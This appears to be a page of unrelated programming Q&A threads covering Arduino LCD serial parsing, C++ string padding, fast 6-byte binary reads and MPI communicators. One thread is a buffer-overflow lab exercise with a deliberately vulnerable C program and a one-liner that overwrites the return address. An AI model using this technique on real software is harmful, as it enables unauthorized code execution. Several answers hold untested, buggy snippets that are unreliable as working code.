Related
I am currently working on making an arduino monitoring device. The data is collected in Python and then the string is sent via serial to the arduino.
In Python the string looks like this:
cpu1 = space_pad(int(my_info['cpu_load']), 2)
cpu2 = space_pad(int(my_info['cpu_temp']), 2)
cpu3 = space_pad(int(my_info['cpu_fan']), 5)
# Send the strings via serial to the Arduino
arduino_str = \
'A' + cpu1 + '|B' + cpu2 + '|C' + cpu3 + '|'
if serial_debug:
print(arduino_str)
else:
ser.write(arduino_str.encode())
Ideally I want to make this string as large as possible, to include 10 variables, which I want to send to the arduino.
The arduino code looks at the string and it is supposed to read parts of the string and place them neatly on a display, each in it's own reserved space.
The problem is that I get garbled results. When the string is only made out of just one variable, then it shows just fine, where it should, as it should.
When adding an additional variable to the string, the code breaks and it mixes the results or displays them chaotically. My variables are all clean, just numbers, nothing fancy.
Below is the code I use on the arduino
#include <Wire.h>
#include <LiquidCrystal_I2C.h> // Library for LCD
LiquidCrystal_I2C lcd(0x27,20,4); // I2C address 0x27, 20 column and 4 rows
String inputString = ""; // String for buffering the message
boolean stringComplete = false; // Indicates if the string is complete
unsigned long previousUpdate = 0; // Long to keep the time since last received message
void printInitialLCDStuff() {
lcd.setCursor(0, 0);
lcd.print("CPU ");
lcd.setCursor(7, 0);
lcd.print("%");
lcd.setCursor(11, 0);
lcd.print("C");
lcd.setCursor(17, 0);
lcd.print("RPM");
lcd.setCursor(0, 1);
lcd.print("GPU ");
lcd.setCursor(7, 1);
lcd.print("%");
lcd.setCursor(11, 1);
lcd.print("C");
lcd.setCursor(17, 1);
lcd.print("RPM");
lcd.setCursor(0, 2);
lcd.print("MEM");
lcd.setCursor(8, 2);
lcd.print("MB");
lcd.setCursor(17, 2);
lcd.print("PWM");
lcd.setCursor(0, 3);
lcd.print("RAM ");
lcd.setCursor(8, 3);
lcd.print("GBU");
lcd.setCursor(17, 3);
lcd.print("GBF");
}
void serialEvent() {
while (Serial.available()) {
char inChar = (char)Serial.read();
inputString += inChar;
if (inChar == '|') {
stringComplete = true;
}
}
}
void setup() {
// Setup LCD
lcd.init(); //initialize the lcd
lcd.backlight(); //open the backlight
lcd.setCursor(0, 0);
printInitialLCDStuff();
// Setup serial
Serial.begin(9600);
inputString.reserve(200);
}
void loop() {
serialEvent();
if (stringComplete) {
// CPU1
int cpu1StringStart = inputString.indexOf("A");
int cpu1StringLimit = inputString.indexOf("|");
String cpu1String = inputString.substring(cpu1StringStart + 1, cpu1StringLimit);
lcd.setCursor(4, 0);
lcd.print(cpu1String);
// CPU2
int cpu2StringStart = inputString.indexOf("B", cpu1StringLimit);
int cpu2StringLimit = inputString.indexOf("|", cpu2StringStart);
String cpu2String = inputString.substring(cpu2StringStart + 1, cpu2StringLimit);
lcd.setCursor(9, 0);
lcd.print(cpu2String);
// CPU3
int cpu3StringStart = inputString.indexOf("C", cpu2StringLimit);
int cpu3StringLimit = inputString.indexOf("|", cpu3StringStart);
String cpu3String = inputString.substring(cpu3StringStart + 1, cpu3StringLimit);
lcd.setCursor(13, 0);
lcd.print(cpu3String);
inputString = "";
stringComplete = false;
previousUpdate = millis();
}
}
My code is very dirty and it mostly an adaptation of another code, because while I can read code, I am terrible at writing it. Apologies if I made horrible mistakes that would make anybody cringe. I admit I am just dabbling with coding. This is why I made notes in the code often.
I expect my display to show like this:
CPU 60% 45C 900RPM
Where
cpu1=60
cpu2=45
cpu3=900
The "CPU" "%", "C" and "RPM" are written by the arduino on printInitialLCDStuff() { and not Python.
Instead I get this
CPU B45% B45|B45|C
and then the RPM is listed on line 3 at (0,0) as "900|"
Ideally I want to expand the string sorting to collect about 10 variables.
It looks to me like the problem is in the arduino code, since the Python script kinda checks out and outputs the string correctly. But I could be wrong.
The question is: am I using the wrong code to extract these variables and place them in their reserved space on the display?
Should I use something else to get the job done? I have been looking at documentation for the past 3 days but I couldn't find someone with a similar case. I found some questions here, but again, not quite what I am looking for.
Any help is appreciated. I am so frustrated with this code after trying hours daily for the past days that I am willing to reward anyone that can assist me with this code with a steam digital gift card as way to show my appreciation.
Best regards,
M
I figured out. Instead of trying to separate the string and allocate it all in a preselected space I just made one single string and just edited the string format itself. Now I have a 80 char string and is auto arranged by (0, 20), (20, 40), (40, 60) and (60, 80).
Because this is just a simple resource monitor I didn't really need anything fancy, just to display the info on the screen.
Here is what I did
# Prepare CPU string line #1
cpu1 = space_pad(int(my_info['cpu_load']), 3) + '% '
cpu2 = space_pad(int(my_info['cpu_temp']), 2) + 'C '
cpu3 = space_pad(int(my_info['cpu_fan']), 4) + 'RPM'
CPU = 'CPU ' + cpu1 + cpu2 + cpu3
# Prepare GPU string line #2
gpu1 = space_pad(int(my_info['gpu_load']), 3) + '% '
gpu2 = space_pad(int(my_info['gpu_temp']), 2) + 'C '
gpu3 = space_pad(int(my_info['gpu_fan']), 4) + 'RPM'
GPU1 = 'GPU ' + gpu1 + gpu2 + gpu3
# Prepare GPU string line #3
gpu4 = space_pad(int(my_info['gpu_mem']), 4) + 'MB '
gpu5 = space_pad(int(my_info['gpu_pwm']), 3) + '% PWM'
GPU2 = 'MEM ' + gpu4 + gpu5
# Prepare RAM strng line #4
ram1 = space_pad(float(my_info['ram_used']), 4) + 'GBU '
ram2 = space_pad(float(my_info['ram_free']), 4) + 'GB'
RAM = 'RAM ' + ram1 + ram2
# Send the strings via serial to the Arduino
arduino_str = \
CPU + GPU1 + GPU2 + RAM + 'F'
if serial_debug:
print(arduino_str)
else:
ser.write(arduino_str.encode())
Because the '|' separator was constantly showing up as the last character of the string, I just switched to a letter that I wanted to appear instead, basically duck-taping it. I used the character 'F' which also acts as the letter and is shown in the string.
As for the Arduino code:
#include <Wire.h>
#include <LiquidCrystal_I2C.h> // Library for LCD
LiquidCrystal_I2C lcd(0x27,20,4); // I2C address 0x27, 20 column and 4 rows
String inputString = ""; // String for buffering the message
boolean stringComplete = false; // Indicates if the string is complete
unsigned long previousUpdate = 0; // Long to keep the time since last received message
void printInitialLCDStuff() {
}
void serialEvent() {
while (Serial.available()) {
char inChar = (char)Serial.read();
inputString += inChar;
if (inChar == 'F') {
stringComplete = true;
}
}
}
void setup() {
// Setup LCD
lcd.init(); //initialize the lcd
lcd.backlight(); //open the backlight
printInitialLCDStuff();
lcd.setCursor(0, 0);
lcd.print("Arduino PC Monitor");
lcd.setCursor(0, 1);
lcd.print("Waiting for data...");
lcd.setCursor(12, 3);
lcd.print("Ver 1.0");
// Setup serial
Serial.begin(9600);
inputString.reserve(200);
}
void loop() {
serialEvent();
if (stringComplete) {
// 1st line
String cpuString = inputString.substring(0, 20);
lcd.setCursor(0, 0);
lcd.print(cpuString);
// 2nd line
String gpu1String = inputString.substring(20, 40);
lcd.setCursor(0, 1);
lcd.print(gpu1String);
// 3rd line
String gpu2String = inputString.substring(40, 60);
lcd.setCursor(0, 2);
lcd.print(gpu2String);
// 4th line
String ramString = inputString.substring(60, 80);
lcd.setCursor(0, 3);
lcd.print(ramString);
inputString = "";
stringComplete = false;
previousUpdate = millis();
}
}
Yes, it is that lazy, it is almost as sophisticated as counting on your fingers. I love how simple it is. Anything can be edited on the fly and all it takes is minimal knowledge.
I can understand if I get banned for being this lazy.
Thank you for your help. I have noted the advice on string splits if I need to do something more complicated.
Best regards,
M
Your code can be changed to make it work, however, it would be like patching it up. I think it is better to take a different approach.
First, on your Python code, the prefix A, B are become redundant and not helpful on the receiving side to parse the data. If you format your data as a string with | as the separator, it make it easier to parse, and it is also much easier to create a string like that in Python.
arduino_str = "{}|{}|{}|{}|{}|{}|{}|{}|{}|{}".format(
data0, data1, data2, data3, data4,
data5, data6, data7, data8, data9)
if serial_debug:
print(arduino_str)
else:
ser.write(arduino_str.encode())
On the Arduino side, Serial.readStringUntil() would make the reading entire string until a \n (end of the string) is encountered. Once the entire string is received, you can use the strtok() function in C++ to split the string by the delimiter (in this case it is |) into an array, so the splitted array would looks like this:
splitted[0] = data0;
splitted[1] = data1;
....
splitted[9] = data9;
You can then print the data in the array to the LCD.
#include <Wire.h>
#include <LiquidCrystal_I2C.h> // Library for LCD
#define NUMBER_OF_DATA 10
LiquidCrystal_I2C lcd(0x27,20,4); // I2C address 0x27, 20 column and 4 rows
String incomingString = "";
void setup()
{
// Setup LCD
lcd.init();
lcd.backlight();
lcd.setCursor(0, 0);
lcd.setCursor(0, 0);
lcd.print("CPU % C RPM");
lcd.setCursor(0, 1);
lcd.print("GPU % C RPM");
lcd.setCursor(0, 2);
lcd.print("MEM MB PWM");
lcd.setCursor(0, 3);
lcd.print("RAM GBU GBF");
// Setup serial
Serial.begin(9600);
}
void loop()
{
// read data from Serial until '\n' is received
while (Serial.available()) {
incomingString = Serial.readBytesUntil('\n');
}
if (incomingString) {
// convert the String object to a c_string
char *c_string = incomingString.c_str();
// make a copy of received data so that incoming data would not override the received data
char temp[strlen(c_string)+1];
strcpy(temp, c_string);
incomingString = "";
// parse the received string separated by '|' into an array
char splitted[NUMBER_OF_DATA][10] = {'\0'}; // initialise an array of 10-ch string
int i = 0;
char *p = strtok(temp, '|'); // parse first element in the string
while(p != NULL) { // loop through the string to fill the array
splitted[i++] = p;
p = strtok(NULL, '|');
}
// update LCD with the data in the array
lcd.setCursor(4, 0);
lcd.print(splitted[0]);
lcd.setCursor(9, 0);
lcd.print(splitted[1]);
lcd.setCursor(13, 0);
lcd.print(splitted[2]);
// print the rest of data
lcd.setCursor(13, 3);
lcd.print(splitted[9]);
}
}
I wrote this based on your code and have not debug on an Arduino yet, so it might need some debugging if it is not work out-of-the-box. I hope this help you in learn some trick and a little bit of C++ string and char array.
In pyhton you are able to do things such as
word = "e" * 5
print(word)
To get
"eeeee"
But when i attempt the same thing in C++ i get issues where the output doesnt contain any text heres the code im attempting
playerInfo.name + ('_' * (20 - sizeof(playerInfo.name)))
Im tyring to balence the length of the string so everything on the player list is inline with each other
Thanks in advance for any help
If your actual problem is that you want to display names to a certain width, then don't modify the underlying data. Instead, take advantage of ostream's formatting capabilities to set alignment and fill width. Underlying data should not be modified to cater to display. The displaying function should be able to take the underlying data and format it as required.
This is taken from https://en.cppreference.com/w/cpp/io/manip/left which describes specifically the std::left function, but shows examples of std::setw and std::fill, which should get you what you want. You will need to #include <iomanip> to to use these functions.
#include <iostream>
#include <iomanip>
int main(int argc, char** argv)
{
const char name1[] = "Yogesh";
const char name2[] = "John";
std::cout << "|" << std::setfill(' ') << std::setw(10) << std::left << name1 << "|\n";
std::cout << "|" << std::setfill('*') << std::setw(10) << std::right << name2 << "|\n";
}
Outputs
|Yogesh |
|******John|
A note on the persistence of std::cout and ostreams
Note that std::cout is a std::ostream object, and by default lives for the lifetime of your program (or for enough of your program that it's close enough to the lifetime). As an object, it has member variables. When we call std::setfill('*') we're setting one of those member variables (the fill character) and overwriting the default fill character. When we call std::setw(10) we're setting the underlying width of the stream until another function clears it.
std::setfill, std::left, std::right will persist until you explicitly set them to something else (they don't return to defaults automatically). std::setw will persist until one of (from https://en.cppreference.com/w/cpp/io/manip/setw)
operator<<(basic_ostream&, char) and operator<<(basic_ostream&, char*)
operator<<(basic_ostream&, basic_string&)
std::put_money (inside money_put::put())
std::quoted (when used with an output stream)
So std::setw will persist until basically the next std::string or const char * output.
In case of repeating a single character, you can use std::string(size_type count, CharT ch) like this:
std::string str(5, 'e');
std::cout << str << std::endl; // eeeee
There is no overloaded * operator for std::string. You have to write a custom function
std::string multiply_str(std::string in, size_t count)
{
std::string ret;
rest.reserve(in.size() * count);
for(int i = 0; i < count; i++)
rest += in;
return ret;
}
Or, if it is only on character:
std::string(your char here, how much)
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 3 years ago.
Improve this question
I’m reading a file in C++ and Python as a binary file. I need to divide the binary into blocks, each 6 bytes. For example, if my file is 600 bytes, the result should be 100 blocks, each 6 bytes.
I have tried struct (in C++ and Python) and array (Python). None of them divide the binary into blocks of 6 bytes. They can only divide the binary into blocks each power of two (1, 2, 4, 8, 16, etc.).
The array algorithm was very fast, reading 1 GB of binary data in less than a second as blocks of 4 bytes. In contrast, I used some other methods, but all of them are extremely slow, taking tens of minutes to do it for a few megabytes.
How can I read the binary as blocks of 6 bytes as fast as possible? Any help in either C++ or Python will be great. Thank you.
EDIT - The Code:
struct Block
{
char data[6];
};
class BinaryData
{
private:
char data[6];
public:
BinaryData() {};
~BinaryData() {};
void readBinaryFile(string strFile)
{
Block block;
ifstream binaryFile;
int size = 0;
binaryFile.open(strFile, ios::out | ios::binary);
binaryFile.seekg(0, ios::end);
size = (int)binaryFile.tellg();
binaryFile.seekg(0, ios::beg);
cout << size << endl;
while ( (int)binaryFile.tellg() < size )
{
cout << binaryFile.tellg() << " , " << size << " , " <<
size - (int)binaryFile.tellg() << endl;
binaryFile.read((char*)block.data,sizeof(block.data));
cout << block.data << endl;
//cin >> block.data;
if (size - (int)binaryFile.tellg() > size)
{
break;
}
}
binaryFile.close();
}
};
Notes :
in the file the numbers are in big endian ( remark )
the goal is to as fast as possible read them then sort them in ascending order ( remark )
Let's start simple, then optimize.
Simple Loop
uint8_t array1[6];
while (my_file.read((char *) &array1[0], 6))
{
Process_Block(&array1[0]);
}
The above code reads in a file, 6 bytes at a time and sends the block to a function.
Meets the requirements, not very optimal.
Reading Larger Blocks
Files are streaming devices. They have an overhead to start streaming, but are very efficient to keep streaming. In other words, we want to read as much data per transaction to reduce the overhead.
static const unsigned int CAPACITY = 6 * 1024;
uint8_t block1[CAPACITY];
while (my_file.read((char *) &block1[0], CAPACITY))
{
const size_t bytes_read = my_file.gcount();
const size_t blocks_read = bytes_read / 6;
uint8_t const * block_pointer = &block1[0];
while (blocks_read > 0)
{
Process_Block(block_pointer);
block_pointer += 6;
--blocks_read;
}
}
The above code reads up to 1024 blocks in one transaction. After reading, each block is sent to a function for processing.
This version is more efficient than the Simple Loop, as it reads more data per transaction. Adjust the CAPACITY to find the optimal size on your platform.
Loop Unrolling
The previous code reduces the first bottleneck of input transfer speed (although there is still room for optimization). Another technique is to reduce the overhead of the processing loop by performing more data processing inside the loop. This is called loop unrolling.
const size_t bytes_read = my_file.gcount();
const size_t blocks_read = bytes_read / 6;
uint8_t const * block_pointer = &block1[0];
while ((blocks_read / 4) != 0)
{
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
blocks_read -= 4;
}
while (blocks_read > 0)
{
Process_Block(block_pointer);
block_pointer += 6;
--blocks_read;
}
You can adjust the quantity of operations in the loop, to see how it affects your program's speed.
Multi-Threading & Multiple Buffers
Another two techniques for speeding up the reading of the data, are to use multiple threads and multiple buffers.
One thread, an input thread, reads the file into a buffer. After reading into the first buffer, the thread sets a semaphore indicating there is data to process. The input thread reads into the next buffer. This repeats until the data is all read. (For a challenge, figure out how to reuse the buffers and notify the other thread of which buffers are available).
The second thread is the processing thread. This processing thread is started first and waits for the first buffer to be completely read. After the buffer has the data, the processing thread starts processing the data. After the first buffer has been processed, the processing thread starts on the next buffer. This repeats until all the buffers have been processed.
The goal here is to use as many buffers as necessary to keep the processing thread running and not waiting.
Edit 1: Other techniques
Memory Mapped Files
Some operating systems support memory mapped files. The OS reads a portion of the file into memory. When a location outside the memory is accessed, the OS loads another portion into memory. Whether this technique improves performance needs to be measured (profiled).
Parallel Processing & Threading
Adding multiple threads may show negligible performance gain. Computers have a data bus (data highway) connecting many hardware devices, including memory, file I/O and the processor. Devices will be paused to let other devices use the data highway. With multiple cores or processors, one processor may have to wait while the other processor is using the data highway. This waiting may cause negligible performance gain when using multiple threads or parallel processing. Also, the operating system has overhead when constructing and maintaining threads.
Try that, the input file is received in argument of the program, as you said I suppose the the 6 bytes values in the file are written in the big endian order, but I do not make assumption for the program reading the file then sorting and it can be executed on both little and big endian (I check the case at the execution)
#include <iostream>
#include <fstream>
#include <vector>
#include <cstdint>
#include <algorithm>
#include <limits.h> // CHAR_BIT
using namespace std;
#if CHAR_BIT != 8
# error that code supposes a char has 8 bits
#endif
int main(int argc, char ** argv)
{
if (argc != 2)
cerr << "Usage: " << argv[1] << " <file>" << endl;
else {
ifstream in(argv[1], ios::binary);
if (!in.is_open())
cerr << "Cannot open " << argv[1] << endl;
else {
in.seekg(0, ios::end);
size_t n = (size_t) in.tellg() / 6;
vector<uint64_t> values(n);
uint64_t * p = values.data(); // for performance
uint64_t * psup = p + n;
in.seekg(0, ios::beg);
int i = 1;
if (*((char *) &i)) {
// little endian
unsigned char s[6];
uint64_t v = 0;
while (p != psup) {
if (!in.read((char *) s, 6))
return -1;
((char *) &v)[0] = s[5];
((char *) &v)[1] = s[4];
((char *) &v)[2] = s[3];
((char *) &v)[3] = s[2];
((char *) &v)[4] = s[1];
((char *) &v)[5] = s[0];
*p++ = v;
}
}
else {
// big endian
uint64_t v = 0;
while (p != psup) {
if (!in.read(((char *) &v) + 2, 6))
return -1;
*p++ = v;
}
}
cout << "file successfully read" << endl;
sort(values.begin(), values.end());
cout << "values sort" << endl;
// DEBUG, DO ON A SMALL FILE ;-)
for (auto v : values)
cout << v << endl;
}
}
}
So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I print large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, and returns to the read_secret function, instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I would have to replace the main() address with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability you have to first identify the offset at which you can get a segfault. In your case I assume its 1026. The whole game is to overwrite the eip(what tells the program what to do next) and then add your own instruction.
To add your own instruction you need to know the address of said instruction and then so in gdb open your program and then type in:
x function name
Then copy the address. You then have to convert it to big or little endian format. I do it with the struct module in python.
import struct
struct.pack("<I", address) # for little endian for big endian its different
Then you have to add it to your input to the binary so something like:
python -c "print 'a' * 1026 + 'the_address'" | /task2/vuln
#on bash shell, not in script
If all of this doesnt work then just add a few more characters to your offset. There might be something you didnt see coming.
python -c "print 'a' * 1034 + 'the_address'" | /task2/vuln
Hope that answers your question.
I have some array of data. What I was trying to do is like this:
Use rank 0 to bcast data to 50 nodes. Each node has 1 mpi process on it with 16 cores available to that process. Then, each mpi process will call python multiprocessing. Some calculations are done, then the mpi process saves the data that was calculated with multiprocessing. The mpi process then changes some variable, and runs multiprocessing again. Etc.
So the nodes do not need to communicate with each other besides the initial startup in which they all receive some data.
The multiprocessing is not working out so well. So now I want to use all MPI.
How can I (or is it not possible) use an array of integers that refers to MPI ranks for bcast or scatter. For example, ranks 1-1000, the node has 12 cores. So every 12th rank I want to bcast the data. Then on every 12th rank, i want it to scatter data to 12th+1 to 12+12 ranks.
This requires the first bcast to communicate with totalrank/12, then each rank will be responsible for sending data to ranks on the same node, then gathering the results, saving it, then sending more data to ranks on the same node.
I don't know enough of mpi4py to be able to give you a code sample with it, but here is what could be a solution in C++. I'm sure you can infer a Python code out of it easily.
#include <mpi.h>
#include <iostream>
#include <cstdlib> /// for abs
#include <zlib.h> /// for crc32
using namespace std;
int main( int argc, char *argv[] ) {
MPI_Init( &argc, &argv );
// get size and rank
int rank, size;
MPI_Comm_rank( MPI_COMM_WORLD, &rank );
MPI_Comm_size( MPI_COMM_WORLD, &size );
// get the compute node name
char name[MPI_MAX_PROCESSOR_NAME];
int len;
MPI_Get_processor_name( name, &len );
// get an unique positive int from each node names
// using crc32 from zlib (just a possible solution)
uLong crc = crc32( 0L, Z_NULL, 0 );
int color = crc32( crc, ( const unsigned char* )name, len );
color = abs( color );
// split the communicator into processes of the same node
MPI_Comm nodeComm;
MPI_Comm_split( MPI_COMM_WORLD, color, rank, &nodeComm );
// get the rank on the node
int nodeRank;
MPI_Comm_rank( nodeComm, &nodeRank );
// create comms of processes of the same local ranks
MPI_Comm peersComm;
MPI_Comm_split( MPI_COMM_WORLD, nodeRank, rank, &peersComm );
// now, masters are all the processes of nodeRank 0
// they can communicate among them with the peersComm
// and with their local slaves with the nodeComm
int worktoDo = 0;
if ( rank == 0 ) worktoDo = 1000;
cout << "Initially [" << rank << "] on node "
<< name << " has " << worktoDo << endl;
MPI_Bcast( &worktoDo, 1, MPI_INT, 0, peersComm );
cout << "After first Bcast [" << rank << "] on node "
<< name << " has " << worktoDo << endl;
if ( nodeRank == 0 ) worktoDo += rank;
MPI_Bcast( &worktoDo, 1, MPI_INT, 0, nodeComm );
cout << "After second Bcast [" << rank << "] on node "
<< name << " has " << worktoDo << endl;
// cleaning up
MPI_Comm_free( &peersComm );
MPI_Comm_free( &nodeComm );
MPI_Finalize();
return 0;
}
As you can see, you first create communicators with processes on the same node. Then you create peer communicators with all processes of the same local rank on each nodes.
From than, your master process of global rank 0 will send data to the local masters. And they will distribute the work on the node they are responsible of.